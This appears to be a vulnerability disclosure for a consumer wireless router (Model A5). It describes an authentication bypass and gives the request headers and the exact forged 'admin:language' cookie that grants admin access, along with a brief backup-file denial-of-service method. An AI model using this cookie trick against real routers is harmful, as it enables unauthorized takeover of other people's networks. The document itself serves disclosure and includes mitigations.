A critical authentication bypass vulnerability has been identified in the TAKASHI Wireless Instant Router and Repeater (Model A5) running firmware version V5.07.38_AAL03 with hardware version V3.0. This vulnerability allows unauthorized users to gain administrative access due to improper session management. This has also allowed for another exploit to be run which will disable the admin panels ability to assign cookies properly using this exploit here Admin Panel Denial of Service Exploit
- Model: A5
- Manufacturer: Tenda
- Software Version: V5.07.38_AAL03
- Hardware Version: V3.0
Improper session management in Takashi Wireless Instant Router and Repeater (Model A5) firmware v5.07.38_AAL03 with hardware v3.0 allows unauthorized attackers to gain admin-level access via a crafted request.
To understand how this vulnerability works, let's compare an unauthenticated request to an authenticated request.
POST /LoginCheck HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.1/login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: http://192.168.2.1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: language=en
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Username=admin&checkEn=0&Password=whatsthepassword
GET /wireless_basic.asp HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.1/advance.asp
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: language=en; admin:language=en
Upgrade-Insecure-Requests: 1
Priority: u=4
The key difference between the two requests is the presence of the following cookie:
admin:language=en
The application trusts the admin:language cookie without properly verifying session authentication. By simply adding this cookie with an arbitrary value, an unauthenticated user can gain full administrative access.
An attacker can exploit this vulnerability by setting the following cookie:
admin:language=<any_value>
Where <any_value> can be any string, text, or number. As long as the cookie is present, the application will treat the user as an authenticated admin.
The DOS Exploit works due to an error with how the backup file is handled for the routers settings. If edited manually you can change the username which is not changable when logging into the router. Basically disableing the ability to log in without somthing like a proxy like burpsuite to intercept and alter the admin username credentials.
- Unauthorized users can gain admin-level access without valid credentials.
- Attackers can modify router settings, expose sensitive data, and potentially disrupt network operations.
- No brute-force or credential stuffing is needed—just cookie manipulation.
To mitigate this issue, the following steps should be taken:
- Proper Session Management: Implement server-side session validation instead of relying on client-side cookies.
- Token-Based Authentication: Use secure session tokens that cannot be forged.
- Session Expiry: Ensure sessions expire and require re-authentication after a set period.
- Cookie Integrity Checks: Validate cookies against an active session in the backend database.
This vulnerability report is for educational and research purposes only. The information provided should not be used for malicious activities. Always obtain proper authorization before testing security vulnerabilities on any system.
Contributors
- William James Schleppegrell